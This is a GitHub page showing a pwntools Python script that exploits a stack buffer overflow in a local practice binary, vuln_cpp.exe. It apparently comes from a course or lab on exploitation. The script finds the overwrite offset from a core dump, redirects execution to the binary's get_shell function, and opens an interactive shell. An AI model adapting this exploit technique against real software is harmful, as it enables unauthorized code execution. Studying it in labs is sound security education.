-
Notifications
You must be signed in to change notification settings - Fork 12
/
exploit_vuln_cpp.py
52 lines (38 loc) · 1.21 KB
/
exploit_vuln_cpp.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
#! /usr/bin/env python
# https://docs.pwntools.com/en/stable/elf/corefile.html
from pwn import *
target_name = './vuln_cpp.exe'
# Set up pwntools for the correct architecture
exe = context.binary = ELF(target_name)
#print(exe.symbols)
# Generate a cyclic pattern so that we can auto-find the offset
payload = cyclic(128, n=8)
# Run the process once so that it crashes
p = process([target_name, payload])
p.wait() # wait for close
# Get the core dump
core = p.corefile
# Our cyclic pattern should have been used as the crashing address, make sure!
#assert p32(core.eip) in payload
offset = cyclic_find(core.read(core.esp, 8), n=8) - 4
#print('offset=', offset)
# search for get_shell function address
# in C; func_address = exe.symbols.get_shell
# in C++; parse the symbols dictionary to look for function name in key
for symbol in exe.symbols.keys():
if symbol.find("get_shell") >=0:
func_address = exe.symbols[symbol]
break
#print(hex(func_address))
payload = flat({
offset: func_address
}, filler='A')
#print(payload)
io = process([target_name, payload])
# receive and print the payload
print(io.recvline())
# Get a shell!
io.sendline(b'id')
print(io.recvline())
# get interactive shell
io.interactive()